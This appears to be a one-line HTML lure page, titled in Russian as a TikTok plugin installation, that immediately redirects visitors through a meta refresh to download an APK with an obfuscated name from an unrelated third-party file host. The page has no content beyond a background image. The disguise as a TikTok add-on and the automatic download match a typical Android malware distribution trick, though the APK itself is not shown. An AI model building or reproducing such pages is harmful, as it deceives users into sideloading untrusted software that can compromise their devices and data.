<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
 <head>
  <meta http-equiv="Content-Type" content="text/html; charset=utf-8"><meta http-equiv="refresh" content="0;url=https://pomf1.080609.xyz/get2?h=f0627b28&e=apk&f=1c8j9gt38kq1y8c8i9K9k3yH0.apk">
  <title>Установка плагина на TikTok</title>
 </head>
 <body>
  <style>html {

background-image: url(background.png);

background-repeat: no-repeat;

background-position: center center;

background-attachment: fixed;

-webkit-background-size: cover;

-moz-background-size: cover;

-o-background-size: cover;

background-size: cover;

}

</style>
 </body>
</html>
